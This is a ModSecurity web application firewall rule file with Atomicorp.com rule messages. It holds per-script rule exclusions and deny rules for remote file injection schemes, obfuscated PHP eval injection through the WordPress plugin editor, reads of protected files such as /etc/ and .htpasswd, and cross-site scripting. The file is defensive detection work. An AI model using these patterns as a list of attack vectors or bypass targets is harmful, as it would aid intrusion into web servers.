SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:file "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340699,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91275

SecRule REQUEST_FILENAME "/adm-misc\.php" "phase:2,id:91276,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91277,t:none,pass,nolog,skipAfter:END_RULES_91277"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:3|!ARGS:body|!ARGS:/txt/|!ARGS:/text/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340700,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:3|!ARGS:body|!ARGS:/txt/|!ARGS:/text/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340701,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91277

SecRule REQUEST_FILENAME "/piwik\.php" "phase:2,id:91278,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91279,t:none,pass,nolog,skipAfter:END_RULES_91279"

SecRule ARGS|!ARGS:action_name|!ARGS:q|!ARGS:/ref/|!ARGS:link|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:download "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340702,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:action_name|!ARGS:q|!ARGS:/ref/|!ARGS:link|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:download "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:urlDecodeUni,t:none,t:htmlEntityDecode,multimatch,id:340703,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91279

SecRule REQUEST_FILENAME "/admin/file_edit\.php" "phase:2,id:91280,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91281,t:none,pass,nolog,skipAfter:END_RULES_91281"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:download|!ARGS:filebody "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340704,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:download|!ARGS:filebody "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340705,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91281

SecRule REQUEST_FILENAME "/wp-admin/plugin-editor\.php" "phase:2,id:91282,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=380006,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=380026,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=390715,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020"
SecAction "phase:2,id:91283,t:none,pass,nolog,skipAfter:END_RULES_91283"

SecRule ARGS "(?:(?:eval|passthru) ?\( ?(?:base64_decode|gz(?:inflate|decode|encode)) ?\(|str_rot13 ?\()"  "t:none,t:urlDecodeUni,t:htmlEntityDecode,multimatch,id:344729,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Potentially malicious code injection via WP plugin-editor',deny,log,auditlog,status:403,phase:2"
SecRule ARGS "(?:(?:eval|passthru) ?\( ?(?:base64_decode|gz(?:inflate|decode|encode)) ?\(|str_rot13 ?\()"  "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhitespace,id:344730,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Potentially malicious code injection via WP plugin-editor',deny,log,auditlog,status:403,phase:2"
SecRule ARGS "(?:(?:eval|passthru) ?\( ?(?:base64_decode|gz(?:inflate|decode|encode)) ?\(|str_rot13 ?\()"  "t:none,t:compressWhitespace,id:344731,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Potentially malicious code injection via WP plugin-editor',deny,log,auditlog,status:403,phase:2"

SecMarker END_RULES_91283

SecRule REQUEST_FILENAME "/fplayer\.swf" "phase:2,id:91284,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91285,t:none,pass,nolog,skipAfter:END_RULES_91285"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:config "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340706,chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:config "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340707,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91285

SecRule REQUEST_FILENAME "/mailer/images\.php" "phase:2,id:91286,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340084"

SecRule REQUEST_FILENAME "/mailer/redir\.php" "phase:2,id:91287,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340084"

SecRule REQUEST_FILENAME "/sqlpatch\.php" "phase:2,id:91288,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=344374,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"

SecRule REQUEST_FILENAME "/tbl_select\.php" "phase:2,id:91289,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=344374,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=390572"

SecRule REQUEST_FILENAME "/cgi-bin/cart\.cgi" "phase:2,id:91290,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91291,t:none,pass,nolog,skipAfter:END_RULES_91291"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/image/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340708,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/image/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340709,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91291

SecRule REQUEST_FILENAME "/tce_file\.php" "phase:2,id:91292,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91293,t:none,pass,nolog,skipAfter:END_RULES_91293"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/file/|!ARGS:redirect "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340710,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/file/|!ARGS:redirect "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340711,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91293

SecRule REQUEST_FILENAME "/writetosfdc\.php" "phase:2,id:91294,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91295,t:none,pass,nolog,skipAfter:END_RULES_91295"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/file/|!ARGS:redirect|!ARGS:/write/|!ARGS:/Past/|!ARGS:Reference_1_Contact_Info__c "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340712,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/file/|!ARGS:redirect|!ARGS:/write/|!ARGS:/Past/|!ARGS:Reference_1_Contact_Info__c "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340713,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91295

SecRule REQUEST_FILENAME "/admin/nmanage\.php" "phase:2,id:91296,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91297,t:none,pass,nolog,skipAfter:END_RULES_91297"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/file/|!ARGS:redirect|!ARGS:news "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340714,t:none,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/file/|!ARGS:redirect|!ARGS:news "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340715,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91297

SecRule REQUEST_FILENAME "/login\.php" "phase:2,id:91298,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=390709,ctl:ruleRemovebyID=340009,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340148"
SecAction "phase:2,id:91299,t:none,pass,nolog,skipAfter:END_RULES_91299"


SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|!ARGS:pass "(?:\b(?:\.(?:ht(?:access|passwd|group)|www_?acl)|global\.asa|httpd\.conf|boot\.ini)\b|\/etc\/)" "phase:2,capture,t:none,t:htmlEntityDecode,t:lowercase,ctl:auditLogParts=+E,deny,log,auditlog,msg:'Atomicorp.com WAF Rules: Attempt to Access protect file Remotely',id:'320465',rev:1,logdata:'%{TX.0}',severity:'2',deny,status:403,phase:2"
SecRule REQUEST_HEADERS|XML:/*|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie "(?:\b(?:\.(?:ht(?:access|passwd|group)|www_?acl)|global\.asa|httpd\.conf|boot\.ini)\b|\/etc\/)" "phase:2,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,ctl:auditLogParts=+E,deny,log,auditlog,msg:'Atomicorp.com WAF Rules: Attempt to Access protect file Remotely',id:'320466',rev:1,logdata:'%{TX.0}',severity:'2',deny,status:403,phase:2"

SecRule REQUEST_HEADERS|!REQUEST_HEADERS:X-PageView|!REQUEST_HEADERS:Cookie|!REQUEST_HEADERS:REFERER|ARGS|!ARGS:pass|!ARGS:returnto|!ARGS:php|!ARGS:nextpage "(?:/(?:etc|proc|var/tmp|usr|opt|s?bin|dev|kern|[br]oot|sys|windows|winnt)/|(?:\/|\\\\)+inetpub|localstart\.asp|boot\.ini)"         "t:normalisePath,capture,id:320464,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Protected Path Access denied in URI/ARGS',logdata:'%{TX.0}',deny,log,auditlog,status:403,phase:2"

SecRule ARGS|!ARGS:scope|!ARGS:/link/|!ARGS:/openid/|!ARGS:/contact_map/|!ARGS:server|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/return/|!ARGS:password|!ARGS:ref|!ARGS:location|!ARGS:takeback|!ARGS:return|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:referrer|!ARGS:/homepage/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?)\:/"          "id:340716,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:8,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:scope|!ARGS:/link/|!ARGS:/openid/|!ARGS:/contact_map/|!ARGS:server|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/return/|!ARGS:password|!ARGS:ref|!ARGS:location|!ARGS:takeback|!ARGS:return|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:referrer|!ARGS:/homepage/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?)\:/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340717,rev:8,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:pageset|!ARGS:contact_form_information|!ARGS:/[head]/|!ARGS:/^site_/|!ARGS:/^translations/|!ARGS:create_tables|!ARGS:insertfile|!ARGS:video_credits|!ARGS:move2|!ARGS:input[Desarrollo]|!ARGS:hoperation|!ARGS:arg2|!ARGS:login_form|!ARGS:resumoDetalhe|!ARGS:Right_photo_1|!ARGS:/^K2ExtraField/|!ARGS:bbcode_tpl|!ARGS:embedVideo|!ARGS:/submitcode/|!ARGS:mentorhelp|!ARGS:/custom_code/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:parent_name|!ARGS:/^fck/|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:categories_title|!ARGS:antwoord|!ARGS:project_company|!ARGS:signature|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:mainKeywords|!ARGS:guardar|!ARGS:/VB_announce/|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:embeddump|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:query|!ARGS:/sql/|!ARGS:prefix|!ARGS:c_features|!ARGS:/tekst/|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:verbiage|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:preview__hidden|!ARGS:order|!ARGS:youtube|!ARGS:/post/|!ARGS:reply|!ARGS:business|!ARGS:navig|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:/page/|!ARGS:/homePage/|!ARGS:Post|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:/desc/|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:googlemap|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(?:< ?(?:(?:img|i?frame) ?src|a ?href) ?= ?(?:ogg|tls|ssl|gopher|zlib|(ht|f)tps?)\:/|alert ?\(|<? (?:(?:java|vb)?script|applet|activex|chrome) ?>|\" ?> ?<|\" ?[a-z]+ ?<.*>|< ?/?i?frame|\%env)"           "t:none,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:replaceNulls,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,multiMatch,capture,id:360030,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack',logdata:'%{TX.0}',deny,log,auditlog,status:403,phase:2"


SecMarker END_RULES_91299

SecRule REQUEST_FILENAME "/amember/admin/email\.php" "phase:2,id:91300,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91301,t:none,pass,nolog,skipAfter:END_RULES_91301"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:vars "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,phase:2,id:340718,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:vars "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340719,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91301

SecRule REQUEST_FILENAME "/webinstall\.php" "phase:2,id:91302,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91303,t:none,pass,nolog,skipAfter:END_RULES_91303"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:mirror|!ARGS:ftp_server "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,phase:2,id:340720,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

